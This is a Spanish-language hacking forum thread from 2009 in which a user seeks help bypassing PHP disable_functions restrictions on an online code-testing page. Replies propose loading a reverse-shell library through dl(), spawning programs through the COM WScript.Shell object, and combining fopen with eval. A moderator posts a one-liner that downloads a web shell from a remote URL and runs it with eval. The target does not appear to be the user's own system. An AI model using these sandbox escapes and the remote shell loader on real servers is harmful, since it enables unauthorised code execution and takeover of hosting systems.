elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Local File Inclusion ???
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Local File Inclusion ???  (Leído 4,990 veces)
APOKLIPTICO


Desconectado Desconectado

Mensajes: 3.871


Toys in the attic.


Ver Perfil
Local File Inclusion ???
« en: 21 Mayo 2009, 00:01 am »

Reescribo este mensaje para reorganizar la info a ver si me pueden ayudar:
Tengo una pagina de esas q te dejan probar el codigo fuente, entonces pense en tratar de hacer una local file inclusion (creo q es este caso).

Bueno estos son los datos q tengo:
- Es un PHP 5.1.2.
- No me deja usar Include.
- disable_functions =    system, shell, exec, system_exec, shell_exec, mysql_pconnect, passthru, popen, proc_open, proc_close, proc_nice, proc_terminate,
- include_path =   .;E:\php5\ext;E:\php5\PEAR;E:\php5\PhpCommon
- open_basedir = .;I:\(Carpeta)\webphpmyadmin;I:\(carpeta);E:\Windows\temp;E:\php5\PhpCommon;I:\(Carpeta)\phpapps\
- Safe_mode = off.

Alguien me puede dar una mano? hace bastante q estoy tratando pero ya me quede sin ideas...

Un abrazo
APOKLIPTICO
« Última modificación: 21 Mayo 2009, 02:01 am por APOKLIPTICO » En línea

AMD Phenom II 1075T X6 @ 290 Mhz x 11 (HT 2036 Mhz NB Link 2616 Mhz) 1.23 Vcore
ASUS M4A89GTD-PRO/USB3
2x2gb G-Skill RipjawsX DDR3 1600 Mhz CL7 (7-8-7-24-25-1T)
Seagate 500 Gb
XFX HD4850 512Mb GDDR3. 650 Mhz/995 Mhz 1.1 Tflops.
WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.589


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: Local File Inclusion ???
« Respuesta #1 en: 21 Mayo 2009, 04:11 am »

prueba dl() para incluir librerías que te lanzen una shell inversa.

también puedes probar eto:
$WshShell = new COM("WScript.Shell");
$oExec = $WshShell->Run("notepad.exe", 7, false);

fuente:
http://cl.php.net/exec

también..
exec() - Ejecutar un programa externo
passthru() - Ejecutar un programa externo y mostrar la salida pura
popen() - Abre un apuntador de archivo de proceso
pcntl_exec() - Ejecuta un programa específico en el espacio de proceso actual

veo que te restringen mysql_pconnect() pero no mysql_connect().
En línea

s E t H

Desconectado Desconectado

Mensajes: 152


Ha tenido un sueño donde todos los pollos eran libres de cruzar una carretera sin tener que justificar sus actos.


Ver Perfil WWW
Re: Local File Inclusion ???
« Respuesta #2 en: 21 Mayo 2009, 04:47 am »

podes usar fopen() y eval()
http://ar.php.net/function.fopen
http://ar.php.net/eval
En línea

APOKLIPTICO


Desconectado Desconectado

Mensajes: 3.871


Toys in the attic.


Ver Perfil
Re: Local File Inclusion ???
« Respuesta #3 en: 21 Mayo 2009, 12:59 pm »

prueba dl() para incluir librerías que te lanzen una shell inversa.

también puedes probar eto:
$WshShell = new COM("WScript.Shell");
$oExec = $WshShell->Run("notepad.exe", 7, false);

fuente:
http://cl.php.net/exec

también..
exec() - Ejecutar un programa externo
passthru() - Ejecutar un programa externo y mostrar la salida pura
popen() - Abre un apuntador de archivo de proceso
pcntl_exec() - Ejecuta un programa específico en el espacio de proceso actual

veo que te restringen mysql_pconnect() pero no mysql_connect().

Que es dl()???
Y lo segundo q me pusiste que es???
exec, passthru() y popen() no me los deja ejecutar, pero pcntl_exec() puede ser q si...


Fopen() me los deja usar y eval() tambien, el primero lo use para leer los archivos de los paths que me deja abrir, pero para q me serviria el eval()???
En línea

AMD Phenom II 1075T X6 @ 290 Mhz x 11 (HT 2036 Mhz NB Link 2616 Mhz) 1.23 Vcore
ASUS M4A89GTD-PRO/USB3
2x2gb G-Skill RipjawsX DDR3 1600 Mhz CL7 (7-8-7-24-25-1T)
Seagate 500 Gb
XFX HD4850 512Mb GDDR3. 650 Mhz/995 Mhz 1.1 Tflops.
s E t H

Desconectado Desconectado

Mensajes: 152


Ha tenido un sueño donde todos los pollos eran libres de cruzar una carretera sin tener que justificar sus actos.


Ver Perfil WWW
Re: Local File Inclusion ???
« Respuesta #4 en: 21 Mayo 2009, 19:52 pm »

eval() ejecuta un codigo php
asi abris la shell o lo que quieras con fopen y lo ejecutas con eval
En línea

APOKLIPTICO


Desconectado Desconectado

Mensajes: 3.871


Toys in the attic.


Ver Perfil
Re: Local File Inclusion ???
« Respuesta #5 en: 21 Mayo 2009, 20:43 pm »

Okay, aparentemente no reconoce la funcion pcntl_exec(), asi que me queda eval(), popen() y mysql_connect(), que hago con eso? sorry gente pero estoy re newbie tanto en php como en LFI.
En línea

AMD Phenom II 1075T X6 @ 290 Mhz x 11 (HT 2036 Mhz NB Link 2616 Mhz) 1.23 Vcore
ASUS M4A89GTD-PRO/USB3
2x2gb G-Skill RipjawsX DDR3 1600 Mhz CL7 (7-8-7-24-25-1T)
Seagate 500 Gb
XFX HD4850 512Mb GDDR3. 650 Mhz/995 Mhz 1.1 Tflops.
APOKLIPTICO


Desconectado Desconectado

Mensajes: 3.871


Toys in the attic.


Ver Perfil
Re: Local File Inclusion ???
« Respuesta #6 en: 16 Junio 2009, 21:24 pm »

Nadie sabe como puedo hacer??
En línea

AMD Phenom II 1075T X6 @ 290 Mhz x 11 (HT 2036 Mhz NB Link 2616 Mhz) 1.23 Vcore
ASUS M4A89GTD-PRO/USB3
2x2gb G-Skill RipjawsX DDR3 1600 Mhz CL7 (7-8-7-24-25-1T)
Seagate 500 Gb
XFX HD4850 512Mb GDDR3. 650 Mhz/995 Mhz 1.1 Tflops.
WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.589


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: Local File Inclusion ???
« Respuesta #7 en: 16 Junio 2009, 22:56 pm »

Okay, aparentemente no reconoce la funcion pcntl_exec(), asi que me queda eval(), popen() y mysql_connect(), que hago con eso? sorry gente pero estoy re newbie tanto en php como en LFI.

Código
  1. <?php eval(file_get_contents('http://web/shell.txt')); ?>
En línea

benny_loppa

Desconectado Desconectado

Mensajes: 2


Ver Perfil
Re: Local File Inclusion ???
« Respuesta #8 en: 23 Julio 2009, 19:08 pm »

i dont speak spanish, i hope is not a problem that im writing in english

from what i've read up you want to do a local file inclusion, i think the best way to do a local file inclusion it's including you files with fopen,require,include,file_get_contents, but be carefull because fopen and file_get_contents is for lfd(local file disclosure)
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Inclusión de ficheros en PHP
PHP
madpitbull_99 3 4,823 Último mensaje 26 Abril 2011, 13:26 pm
por madpitbull_99
Inclusión mutua de clases C++
Programación C/C++
darkvidhack 1 2,553 Último mensaje 26 Diciembre 2011, 17:30 pm
por darkvidhack
Local File Inclusion
Hacking
gothic_krow 0 2,270 Último mensaje 7 Abril 2013, 22:40 pm
por gothic_krow
Inclusión de fichero local en Sophos UTM 9
Noticias
wolfbcn 0 1,434 Último mensaje 31 Octubre 2017, 02:40 am
por wolfbcn
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines